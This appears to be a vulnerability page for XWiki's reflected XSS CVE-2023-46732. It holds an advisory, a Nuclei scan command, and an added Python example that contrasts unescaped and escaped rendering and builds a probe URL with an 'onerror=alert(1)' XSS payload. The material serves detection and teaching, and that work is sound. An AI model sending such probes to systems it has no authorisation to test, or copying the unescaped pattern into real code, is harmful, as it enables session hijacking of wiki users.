
Exploit for XWiki < 14.10.14 - Cross-Site Scripting (CVE-2023-46732)

Description:

XWiki is vulnerable to reflected cross-site scripting (RXSS) via the rev request parameter, whose value is written into the content menu without escaping. An attacker who convinces a logged-in user to open a link with a crafted rev value can run script in that user's session and perform arbitrary actions in the user's name; if the victim holds programming right, this extends to remote code execution (Groovy) on the server, compromising the confidentiality, integrity and availability of the whole XWiki installation.
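The following is an added example, not code from the original page or from XWiki itself. It shows the generic shape of the bug described above (a query parameter concatenated into HTML unescaped, beside the escaped form a fix would use) and the reflection check a scanner such as the Nuclei template performs: send a marker payload in the parameter and decide whether it came back verbatim, encoded, or not at all. The URL path, the anchor markup and the payload are illustrative assumptions, not XWiki's actual template or the template's real matcher.

```python
"""Added example: reflected-XSS pattern and reflection check (assumed markup)."""
import html
from urllib.parse import quote, urlencode

# Assumed marker payload; a real scan would use a unique, harmless token.
PAYLOAD = '"><img src=x onerror=alert(1)>'


def render_menu_unescaped(rev: str) -> str:
    """Vulnerable pattern: the raw parameter lands in attribute and text context.

    The path and markup are illustrative, standing in for the content menu
    the advisory refers to.
    """
    return f'<a href="/xwiki/bin/view/Main/?rev={rev}">Version {rev}</a>'


def render_menu_escaped(rev: str) -> str:
    """Hardened pattern: URL-encode inside the href, HTML-escape in text."""
    return (
        f'<a href="/xwiki/bin/view/Main/?rev={quote(rev, safe="")}">'
        f'Version {html.escape(rev, quote=True)}</a>'
    )


def build_probe_url(base_url: str, payload: str = PAYLOAD) -> str:
    """Build the probe request the way a scanner would (path is assumed)."""
    return base_url.rstrip("/") + "/xwiki/bin/view/Main/?" + urlencode({"rev": payload})


def classify_reflection(body: str, payload: str = PAYLOAD) -> str:
    """Scanner-style matcher over a response body.

    'unescaped' : payload appears verbatim, so a browser would parse the
                  injected tag -> vulnerable.
    'escaped'   : only an HTML- or URL-encoded copy is present -> safe.
    'absent'    : the parameter is not reflected on this page at all.
    """
    if payload in body:
        return "unescaped"
    if html.escape(payload, quote=True) in body or quote(payload, safe="") in body:
        return "escaped"
    return "absent"


if __name__ == "__main__":
    # Constructed responses standing in for a vulnerable and a patched server.
    vulnerable_body = "<html>" + render_menu_unescaped(PAYLOAD) + "</html>"
    patched_body = "<html>" + render_menu_escaped(PAYLOAD) + "</html>"
    print(build_probe_url("http://xwiki.example"))
    print("vulnerable server:", classify_reflection(vulnerable_body))
    print("patched server:   ", classify_reflection(patched_body))
```

The check is deliberately binary on the raw payload: an encoded echo proves the parameter is reflected but not exploitable, which is why a scanner should not match on a partial string such as `alert(1)` alone.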

Nuclei Template

The template is published in the nuclei-templates repository as http/cves/2023/CVE-2023-46732.yaml.

Validate with Nuclei

echo "$URL" | nuclei -t ~/nuclei-templates/http/cves/2023/CVE-2023-46732.yaml

Here $URL is the base URL of the XWiki instance under test; the template supplies the request path and the crafted rev parameter.

References:

https://nvd.nist.gov/vuln/detail/CVE-2023-46732
https://jira.xwiki.org/browse/XWIKI-21095